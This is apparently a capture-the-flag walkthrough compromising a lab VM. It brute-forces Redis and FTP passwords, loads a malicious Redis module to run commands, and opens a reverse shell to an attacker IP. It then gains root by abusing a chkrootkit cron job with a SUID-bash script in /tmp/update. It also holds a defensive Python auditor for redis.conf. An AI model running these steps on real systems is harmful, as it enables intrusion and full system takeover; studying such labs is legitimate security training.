# Lab setup
Download: System
NAT, IP: 192.168.1.148
# Penetration process
# Initial information gathering
```
PORT STATE SERVICE VERSION
2121/tcp open ftp pyftpdlib 1.5.6
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.1.148:2121
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
6379/tcp open redis Redis key-value store
8000/tcp open http SimpleHTTPServer 0.6 (Python 3.9.2)
|_http-server-header: SimpleHTTP/0.6 Python/3.9.2
|_http-title: Site doesn't have a title (text/html).
```
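Using the `redis_login` module in metasploit with the rockyou wordlist, I got the password bonjour.
However, redis was not much use: it had hardly any privileges.
Use the recovered password to enumerate ftp: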
```
┌──(root㉿kali)-[~]
└─# hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p 'bonjour' 192.168.1.148 ftp -s 2121 -t 64 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-24 02:09:21
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10177 login tries (l:10177/p:1), ~160 tries per task
[DATA] attacking ftp://192.168.1.148:2121/
[2121][ftp] host: 192.168.1.148 login: ben password: bonjour
[STATUS] 1153.00 tries/min, 1153 tries in 00:01h, 9024 to do in 00:08h, 64 active
```
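This gives one set of credentials: ben/bonjour

Logging in over ftp turned up no information worth collecting.

Uploading files gave no way to exploit anything either; the web service is Python, which is frustrating...
# Load Redis Module
Upload a .so module and load it into redis.

Project: RedisModules-ExecuteCommand

After compiling it, upload it over ftp.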
```
192.168.1.148:6379> MODULE LOAD /srv/ftp/module.so
OK
192.168.1.148:6379> system.exec "id"
"uid=1000(ben) gid=1000(ben) grupos=1000(ben)\n"
192.168.1.148:6379> system.exec "bash -c 'bash -i >& /dev/tcp/192.168.1.129/4444 0>&1'"
```
Got a shell.
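
Seen from the defender's side, the steps above depended on a guessable `requirepass`, a Redis port reachable from the network, and `MODULE LOAD` being available to an authenticated client. The following is an added example, not part of the original writeup or of Redis: a small auditor that checks a `redis.conf` for those settings. The two sample configs, the finding names, the one-entry wordlist and the 32-character password threshold are assumptions made for illustration.

```python
import shlex

# Constructed configs for illustration; not recovered from the target machine.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
requirepass bonjour
"""
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass 3f9a1c7e5b2d4086a9c1e7f35b2d40869a1c7e5f
enable-module-command no
rename-command MODULE ""
"""
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
MIN_PASS_LEN = 32  # assumed policy threshold, not a Redis default

def parse(conf_text):
    """Collect directives as {name: [args, ...]}, keeping empty quoted args."""
    directives = {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            name, *args = shlex.split(line)
            directives.setdefault(name.lower(), []).append(args)
    return directives

def last(directives, name, default):
    """First argument of the last occurrence of a directive, or the default."""
    args = directives.get(name, [[default]])[-1]
    return args[0] if args else default

def audit(conf_text, wordlist=("bonjour",)):
    """Return sorted finding ids for the weaknesses this walkthrough relied on."""
    d, findings = parse(conf_text), set()
    password = last(d, "requirepass", "")
    if password in wordlist or len(password) < MIN_PASS_LEN:
        findings.add("weak-requirepass")
    # With no bind directive Redis listens on every interface, hence "*".
    binds = [a.lstrip("-") for args in d.get("bind", [["*"]]) for a in args]
    if any(a not in LOOPBACK for a in binds):
        findings.add("non-loopback-bind")
    if last(d, "protected-mode", "yes").lower() != "yes":
        findings.add("protected-mode-off")
    renamed = any(len(a) == 2 and a[0].upper() == "MODULE" and a[1] == ""
                  for a in d.get("rename-command", []))
    if not renamed and last(d, "enable-module-command", "").lower() != "no":
        findings.add("module-load-not-disabled")
    return sorted(findings)
```

The module check is deliberately conservative: it reports any config that does not explicitly disable `MODULE`, because older Redis versions have no `enable-module-command` gate at all.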
# Privilege escalation
Uploading pspy revealed a scheduled task that runs chkrootkit.

Write a reverse shell into /tmp/update:
```bash
#!/bin/bash
chmod +s /bin/bash
```
After waiting, run `/bin/bash -p`.

Got root privileges.